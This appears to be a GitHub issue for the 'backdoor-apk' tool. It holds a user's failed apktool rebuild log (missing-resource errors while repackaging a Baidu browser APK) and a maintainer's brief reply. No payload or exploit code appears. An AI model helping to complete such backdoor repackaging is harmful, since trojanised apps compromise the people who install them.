/root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hq.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hq.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hr.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationTitle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hr.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hr.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hr.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hr.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationTitle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hr.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hr.xml:13: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hr.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/NotificationContent'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/hy.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_gridview'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/hy.xml:4: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_gridview'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/i0.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_gridview'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/i0.xml:10: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_gridview'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/i1.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_gridview'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/i1.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_gridview'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/i2.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_location'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/i2.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/subscription_common_location'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/i7.xml:9: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_cyber_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/i7.xml:9: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_cyber_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/i8.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/video_loading_speed'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/i8.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/video_loading_speed'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/i8.xml:9: error: Error: No resource found that matches the given name (at 'style' with value '@style/video_loading_speed'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/i8.xml:10: error: Error: No resource found that matches the given name (at 'style' with value '@style/video_loading_speed'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/i9.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_cyber_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/i9.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_cyber_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ia.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ia.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ia.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ia.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ib.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_fullscreen_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ib.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_fullscreen_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/id.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/id.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/id.xml:6: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/id.xml:6: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ie.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ie.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ie.xml:9: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ie.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ie.xml:13: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ie.xml:5: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ie.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ie.xml:9: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ie.xml:11: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ie.xml:13: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_list_small_item'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ig.xml:5: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ig.xml:5: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ig.xml:5: error: No resource identifier found for attribute 'baseOn' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ig.xml:5: error: No resource identifier found for attribute 'scale' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/ik.xml:9: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_cyber_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/ik.xml:9: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_cyber_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/io.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_fullscreen_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/io.xml:6: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_fullscreen_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/iq.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/iq.xml:7: error: Error: No resource found that matches the given name (at 'layout' with value '@layout/video_loading_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:18: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:22: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:23: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:25: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:26: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:28: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/it.xml:29: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:11: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:12: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:14: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:15: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:17: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:18: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:22: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:23: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:25: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:26: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:28: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites_layout'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/it.xml:29: error: Error: No resource found that matches the given name (at 'style' with value '@style/widget_search_hotsites'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/k.xml:11: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/n.xml:7: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/n.xml:7: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/q.xml:5: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/r.xml:6: error: No resource identifier found for attribute 'ratio' in package 'com.baidu.browser.inter' W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/s.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/s.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/s.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/s.xml:8: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/t.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/t.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdEditText2'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout/w.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogTextStyle'). W: W: /root/Desktop/backdoor-apk/backdoor-apk/original/res/layout-v17/w.xml:6: error: Error: No resource found that matches the given name (at 'style' with value '@style/BdFifaDialogTextStyle'). W: Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_5007590487381701155.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 19, --version-code, 165, --version-name, 6.4.0.4, -F, /tmp/APKTOOL6128317163179204445.tmp, -0, data, -0, dat, -0, webp, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Desktop/backdoor-apk/backdoor-apk/original/res, -M, /root/Desktop/backdoor-apk/backdoor-apk/original/AndroidManifest.xml] at brut.androlib.Androlib.buildResourcesFull(Androlib.java:437) at brut.androlib.Androlib.buildResources(Androlib.java:371) at brut.androlib.Androlib.build(Androlib.java:281) at brut.androlib.Androlib.build(Androlib.java:254) at brut.apktool.Main.cmdBuild(Main.java:224) at brut.apktool.Main.main(Main.java:84) Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_5007590487381701155.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 19, --version-code, 165, --version-name, 6.4.0.4, -F, /tmp/APKTOOL6128317163179204445.tmp, -0, data, -0, dat, -0, webp, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Desktop/backdoor-apk/backdoor-apk/original/res, -M, /root/Desktop/backdoor-apk/backdoor-apk/original/AndroidManifest.xml] at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:436) at brut.androlib.Androlib.buildResourcesFull(Androlib.java:423) ... 5 more Caused by: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_5007590487381701155.tmp, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 19, --version-code, 165, --version-name, 6.4.0.4, -F, /tmp/APKTOOL6128317163179204445.tmp, -0, data, -0, dat, -0, webp, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Desktop/backdoor-apk/backdoor-apk/original/res, -M, /root/Desktop/backdoor-apk/backdoor-apk/original/AndroidManifest.xml] at brut.util.OS.exec(OS.java:95) at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:430) ... 6 more

dana-at-cp commented 8 years ago

I'm sorry you are having trouble. It appears that you have to figure out why apktool is not happy on your system. Research the apktool exceptions that are in the log output.